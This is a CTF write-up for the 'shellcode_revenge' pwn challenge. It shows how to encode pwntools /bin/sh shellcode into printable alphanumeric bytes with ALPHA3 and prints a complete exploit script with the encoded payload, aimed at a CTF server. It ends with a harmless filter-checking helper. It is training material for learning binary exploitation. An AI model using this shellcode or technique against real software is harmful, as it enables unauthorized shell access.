mrctf2020_shellcode_revenge

This challenge is a note on using the ALPHA3 tool to generate printable shellcode.

Download alpha3:

git clone https://github.com/TaQini/alpha3.git

Write a script that generates ordinary shellcode:

from pwn import *

context.arch = "amd64"

# Assemble pwntools' stock /bin/sh shellcode and save the raw bytes to sc.bin
with open('sc.bin', 'wb') as f:
    f.write(asm(shellcraft.sh()))

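After running it, use alpha3.py to generate shellcode made up of printable characters, and use the result as the payload:

from pwn import *

p = process("./mrctf2020_shellcode_revenge")
# Placeholder: replace with the printable shellcode produced by alpha3.py
payload = b"your_shellcode"
p.sendafter(b'magic!', payload)
p.interactive()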

exp:

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# p = process("./mrctf2020_shellcode_revenge")  # local run
p = remote("node4.buuoj.cn", 25535)
# Printable shellcode generated with alpha3.py
payload = b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
p.sendafter(b'magic!', payload)
p.interactive()
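
The following is an added example, not code from the original post: it models the input restriction as "ASCII letters and digits only" and shows that the encoded payload from the exp passes such a filter, while raw machine-code bytes and a stray trailing newline do not. The allowed set is an assumption (the page does not show the binary's check), and `RAW_SAMPLE` is a constructed byte string, not a working payload.

```python
import string

# Assumption: the program accepts only ASCII letters and digits. The page does
# not show the binary's check, so this set is illustrative.
ALLOWED = frozenset((string.ascii_letters + string.digits).encode())


def violations(data: bytes, allowed=ALLOWED):
    """Return (offset, byte) for every byte outside the allowed set."""
    return [(i, b) for i, b in enumerate(data) if b not in allowed]


def report(name: str, data: bytes) -> bool:
    """Print a short verdict and return True when the filter would pass."""
    bad = violations(data)
    if not bad:
        print(f"{name}: {len(data)} bytes, all within the allowed set")
        return True
    first_off, first_byte = bad[0]
    print(f"{name}: {len(bad)}/{len(data)} bytes rejected, "
          f"first at offset {first_off} (0x{first_byte:02x})")
    return False


# Payload string exactly as it appears in the exp on this page.
PAGE_PAYLOAD = b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"

# Constructed sample: the first two bytes happen to be alphanumeric ('H', '1'),
# the remaining three are not.
RAW_SAMPLE = bytes([0x48, 0x31, 0xF6, 0x0F, 0x05])

if __name__ == "__main__":
    report("raw sample", RAW_SAMPLE)
    report("page payload", PAGE_PAYLOAD)
    # A trailing newline (sendline() would append one) is outside the set too.
    report("page payload + newline", PAGE_PAYLOAD + b"\n")
```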